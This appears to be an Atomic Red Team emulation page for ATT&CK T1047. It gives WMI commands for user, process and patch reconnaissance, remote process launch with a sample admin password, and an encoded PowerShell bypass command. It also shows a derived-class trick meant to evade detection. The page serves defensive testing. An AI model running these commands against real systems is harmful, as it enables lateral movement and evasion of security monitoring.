Skip to content

Latest commit

 

History

History
275 lines (139 loc) · 7.96 KB

T1047.md

File metadata and controls

275 lines (139 loc) · 7.96 KB

T1047 - Windows Management Instrumentation

Adversaries may abuse Windows Management Instrumentation (WMI) to achieve execution. WMI is a Windows administration feature that provides a uniform environment for local and remote access to Windows system components. It relies on the WMI service for local and remote access and the server message block (SMB) (Citation: Wikipedia SMB) and Remote Procedure Call Service (RPCS) (Citation: TechNet RPC) for remote access. RPCS operates over port 135. (Citation: MSDN WMI)

An adversary can use WMI to interact with local and remote systems and use it as a means to perform many tactic functions, such as gathering information for Discovery and remote Execution of files as part of Lateral Movement. (Citation: FireEye WMI SANS 2015) (Citation: FireEye WMI 2015)

Atomic Tests


Atomic Test #1 - WMI Reconnaissance Users

An adversary might use WMI to list all local User Accounts. When the test completes , there should be local user accounts information displayed on the command line.

Supported Platforms: Windows

Attack Commands: Run with command_prompt!

wmic useraccount get /ALL /format:csv


Atomic Test #2 - WMI Reconnaissance Processes

An adversary might use WMI to list Processes running on the compromised host. When the test completes , there should be running processes listed on the command line.

Supported Platforms: Windows

Attack Commands: Run with command_prompt!

wmic process get caption,executablepath,commandline /format:csv


Atomic Test #3 - WMI Reconnaissance Software

An adversary might use WMI to list installed Software hotfix and patches. When the test completes, there should be a list of installed patches and when they were installed.

Supported Platforms: Windows

Attack Commands: Run with command_prompt!

wmic qfe get description,installedOn /format:csv


Atomic Test #4 - WMI Reconnaissance List Remote Services

An adversary might use WMI to check if a certain Remote Service is running on a remote device. When the test completes, a service information will be displayed on the screen if it exists. A common feedback message is that "No instance(s) Available" if the service queried is not running. A common error message is "Node - (provided IP or default) ERROR Description =The RPC server is unavailable" if the provided remote host is unreacheable

Supported Platforms: Windows

Inputs:

Name Description Type Default Value
node Ip Address String 127.0.0.1
service_search_string Name Of Service String Spooler

Attack Commands: Run with command_prompt!

wmic /node:"#{node}" service where (caption like "%#{service_search_string}%")


Atomic Test #5 - WMI Execute Local Process

This test uses wmic.exe to execute a process on the local host. When the test completes , a new process will be started locally .A notepad application will be started when input is left on default.

Supported Platforms: Windows

Inputs:

Name Description Type Default Value
process_to_execute Name or path of process to execute. String notepad.exe

Attack Commands: Run with command_prompt!

wmic process call create #{process_to_execute}

Cleanup Commands:

wmic process where name='#{process_to_execute}' delete >nul 2>&1


Atomic Test #6 - WMI Execute Remote Process

This test uses wmic.exe to execute a process on a remote host. Specify a valid value for remote IP using the node parameter. To clean up, provide the same node input as the one provided to run the test A common error message is "Node - (provided IP or default) ERROR Description =The RPC server is unavailable" if the default or provided IP is unreachable

Supported Platforms: Windows

Inputs:

Name Description Type Default Value
node Ip Address String 127.0.0.1
user_name Username String DOMAIN\Administrator
password Password String P@ssw0rd1
process_to_execute Name or path of process to execute. String notepad.exe

Attack Commands: Run with command_prompt!

wmic /user:#{user_name} /password:#{password} /node:"#{node}" process call create #{process_to_execute}

Cleanup Commands:

wmic /user:#{user_name} /password:#{password} /node:"#{node}" process where name='#{process_to_execute}' delete >nul 2>&1


Atomic Test #7 - Create a Process using WMI Query and an Encoded Command

Solarigate persistence is achieved via backdoors deployed via various techniques including using PowerShell with an EncodedCommand Powershell -nop -exec bypass -EncodedCommand Where the –EncodedCommand, once decoded, would resemble: Invoke-WMIMethod win32_process -name create -argumentlist ‘rundll32 c:\windows\idmu\common\ypprop.dll _XInitImageFuncPtrs’ -ComputerName WORKSTATION The EncodedCommand in this atomic is the following: Invoke-WmiMethod -Path win32_process -Name create -ArgumentList notepad.exe You should expect to see notepad.exe running after execution of this test. Solarigate Analysis from Microsoft

Supported Platforms: Windows

Attack Commands: Run with command_prompt!

powershell -exec bypass -e SQBuAHYAbwBrAGUALQBXAG0AaQBNAGUAdABoAG8AZAAgAC0AUABhAHQAaAAgAHcAaQBuADMAMgBfAHAAcgBvAGMAZQBzAHMAIAAtAE4AYQBtAGUAIABjAHIAZQBhAHQAZQAgAC0AQQByAGcAdQBtAGUAbgB0AEwAaQBzAHQAIABuAG8AdABlAHAAYQBkAC4AZQB4AGUA


Atomic Test #8 - Create a Process using obfuscated Win32_Process

This test tries to mask process creation by creating a new class that inherits from Win32_Process. Indirect call of suspicious method such as Win32_Process::Create can break detection logic. Cybereason blog post No Win32_ProcessNeeded

Supported Platforms: Windows

Inputs:

Name Description Type Default Value
new_class Derived class name String Win32_Atomic
process_to_execute Name or path of process to execute. String notepad.exe

Attack Commands: Run with powershell! Elevation Required (e.g. root or admin)

$Class = New-Object Management.ManagementClass(New-Object Management.ManagementPath("Win32_Process"))
$NewClass = $Class.Derive("#{new_class}")
$NewClass.Put()
Invoke-WmiMethod -Path #{new_class} -Name create -ArgumentList #{process_to_execute}

Cleanup Commands:

$CleanupClass = New-Object Management.ManagementClass(New-Object Management.ManagementPath("#{new_class}"))
$CleanupClass.Delete()